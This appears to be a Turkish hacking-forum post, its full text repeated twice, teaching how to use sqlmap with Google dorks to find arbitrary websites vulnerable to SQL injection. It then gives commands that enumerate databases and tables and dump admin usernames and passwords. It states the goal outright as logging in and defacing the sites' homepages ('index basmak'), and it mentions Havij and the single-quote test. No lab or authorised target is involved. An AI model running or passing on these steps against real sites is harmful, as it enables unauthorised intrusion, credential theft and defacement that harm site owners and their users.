Merhaba dostlar. sqlmap ile dork taramayı göstereceğim.
sqlmapa şu tarz bir kod gireceğiz
Kod:
sqlmap.py -g inurl:index.php?id=
-g yazarak google dork kullanacağımı belirttim ve ardından dorkumu yazdım.
Ben index.php?id= dorkunu kullandım. sizler farklı dorklar kullanırsanız daha iyi sonuç alirsiniz..
evet. tarama başladı ve buldu bir tane. şimdi;
Y = sitede sql açığını sorgular
N = taramdaki diğer siteye geçer
Q = sqlmap'den çıkar.
Ben "y" diyeyim de sql sorgusu yapsın bakalım
y diyip devam ediyorum ve sonucum olumlu. Devamı databaseye girme mevzusu oluyor
Dostlar mesela Y/n yazmış. Büyük harfler sqlmap tarafından önerilen seçeneklerdir aklınızda bulunsun
Taratma kısmına geçelim o'zaman ;
Daha sonra:
sqlmap.py -u "hedefsite.com" --dbs databaseyi çekmeye çalışır (Unutmayın büyük harfler sqlmap önerisidir kullanınız)
Databaseyi çekmeyi başarırsa şunu yazıyoruz;
sqlmap.py -u "hedefsite.com -D (db'nin adı) --tables
tabloları çekmeye başlıyacaktır ( databaseyi çekmeyi başarırsa tabloları %90 ihtimalle çekecektir.)
Varsayalım tablolar düştü elinizde admin paneliniz'de var heyecan şimdi başlıyor.
sqlmap.py -u "hedefsite.com -D (db'nin adı) -T (tablodan düşen admin olsun bizimkisi) admin -C admin,pass --dump
Dump komutu ile admin ve passımızı çektiğimize göre rahat rahat index basabilirsiniz (araya virgül, koyarak bütün tabloları toplu şekilde çekebilirsiniz )
Unutmayalım lütfen bazı sitelere havij ile girersiniz bazılarına sqlmap ile ( tercihim tabiki sqlmap )
Not : Son olarak sql açıklı düşündüğünüz sitenin sonuna tek tırnak (') (Shift+2 harflerin üstündeki iki) yazarak anlayabilirsiniz
İyi eğlenceler, iyi forumlar arkadaşlar.
sqlmapa şu tarz bir kod gireceğiz
Kod:
sqlmap.py -g inurl:index.php?id=
-g yazarak google dork kullanacağımı belirttim ve ardından dorkumu yazdım.
Ben index.php?id= dorkunu kullandım. sizler farklı dorklar kullanırsanız daha iyi sonuç alirsiniz..
evet. tarama başladı ve buldu bir tane. şimdi;
Y = sitede sql açığını sorgular
N = taramdaki diğer siteye geçer
Q = sqlmap'den çıkar.
Ben "y" diyeyim de sql sorgusu yapsın bakalım
y diyip devam ediyorum ve sonucum olumlu. Devamı databaseye girme mevzusu oluyor
Dostlar mesela Y/n yazmış. Büyük harfler sqlmap tarafından önerilen seçeneklerdir aklınızda bulunsun
Taratma kısmına geçelim o'zaman ;
Daha sonra:
sqlmap.py -u "hedefsite.com" --dbs databaseyi çekmeye çalışır (Unutmayın büyük harfler sqlmap önerisidir kullanınız)
Databaseyi çekmeyi başarırsa şunu yazıyoruz;
sqlmap.py -u "hedefsite.com -D (db'nin adı) --tables
tabloları çekmeye başlıyacaktır ( databaseyi çekmeyi başarırsa tabloları %90 ihtimalle çekecektir.)
Varsayalım tablolar düştü elinizde admin paneliniz'de var heyecan şimdi başlıyor.
sqlmap.py -u "hedefsite.com -D (db'nin adı) -T (tablodan düşen admin olsun bizimkisi) admin -C admin,pass --dump
Dump komutu ile admin ve passımızı çektiğimize göre rahat rahat index basabilirsiniz (araya virgül, koyarak bütün tabloları toplu şekilde çekebilirsiniz )
Unutmayalım lütfen bazı sitelere havij ile girersiniz bazılarına sqlmap ile ( tercihim tabiki sqlmap )
Not : Son olarak sql açıklı düşündüğünüz sitenin sonuna tek tırnak (') (Shift+2 harflerin üstündeki iki) yazarak anlayabilirsiniz
İyi eğlenceler, iyi forumlar arkadaşlar.
Son düzenleme: